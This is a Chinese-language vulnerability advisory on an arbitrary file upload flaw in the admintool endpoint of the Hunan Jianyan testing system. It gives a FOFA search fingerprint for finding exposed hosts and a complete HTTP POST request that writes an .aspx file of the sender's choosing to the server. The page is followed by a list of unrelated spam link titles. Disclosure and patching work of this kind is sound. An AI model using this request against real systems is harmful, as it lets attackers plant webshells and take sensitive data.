当前位置: 首页 > news >正文

什么类型的网站流量高全专业优化公司

什么类型的网站流量高,全专业优化公司,做网站怎么自定义背景图片,即墨区城乡建设局网站官网文章目录 前言声明一、漏洞详情二、影响版本三、漏洞复现四、修复建议 前言 湖南建研检测系统 admintool接口任意文件上传漏洞,攻击者可通过该漏洞获取服务器敏感信息。 声明 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者…

文章目录

  • 前言
  • 声明
  • 一、漏洞详情
  • 二、影响版本
  • 三、漏洞复现
  • 四、修复建议


前言

湖南建研检测系统 admintool接口任意文件上传漏洞,攻击者可通过该漏洞获取服务器敏感信息。


声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、漏洞详情

本检测信息管理系统能够实现检验工作的计算机化和网络化管理,基本实现检测数据的自动采集 确保检验数据的公正性、科学性和准确性,确保检验报告的规范性和权威性,确保检验工作的高效率和服务的及时性, admintool 接口存在任意文件上传漏洞。

二、影响版本

湖南建研-检测系统 

在这里插入图片描述

三、漏洞复现

FOFA: body="/Content/Theme/Standard/webSite/login.css"

上传文件数据包

POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: ip:host
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 41
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, brfilePath=log.aspx&fileContent=abc

在这里插入图片描述
访问上传路径
在这里插入图片描述

四、修复建议

升级至最新版本

http://www.shuangfujiaoyu.com/news/16680.html

相关文章:

  • wordpress漫画站主题seo排名查询工具
  • 日本网站制作微信朋友圈营销方案
  • 摄影网站首页设计整站多关键词优化
  • 杭州做网站哪家公司好近期国内新闻
  • 什么网站是solr做的百度开放平台
  • 免费网站一键生成怎样做品牌推广
  • 网站一条龙服务学企业管理培训班
  • 网站建设中是因为没有ftp上传吗seo视频教程我要自学网
  • 东西湖网站建设公司windows清理优化大师
  • 个人做免费的网站站长工具端口检测
  • 运城市盐湖区姚孟精诚网站开发中心超级外链工具
  • 皖icp阜阳网站建设搜索引擎有哪些好用
  • 广东网站开发需要多少钱最新军事战争新闻消息
  • wordpress一站式开发seo优化包括哪些
  • 站长工具seo综合查询怎么关闭如何推广微信公众号
  • 建筑网站新闻写那些好搜索引擎优化策略不包括
  • 国外b2b网站大全河南网站推广那家好
  • 用wordpress建站之后如何优化长沙靠谱seo优化价格
  • 如何做网站推广页面深圳网络公司推广公司
  • 个人信息管理网站建设yandex引擎
  • 用vps建网站备案网站seo文章
  • 用java软件做网站视频号直播推广二维码
  • 网上商城网站开发需求说明书整合营销策划
  • 网站建设 图标推广方案
  • 做网批的网站网络营销策略的特点
  • 做时时彩网站微信平台有哪些河南网站建设制作
  • 网站备案幕布怎么申请近三天发生的大事
  • 南京响应式网站制作最新小组排名
  • 华与建设集团有限公司网站如何做好一个网站
  • 导购类网站怎么做的房地产十大营销手段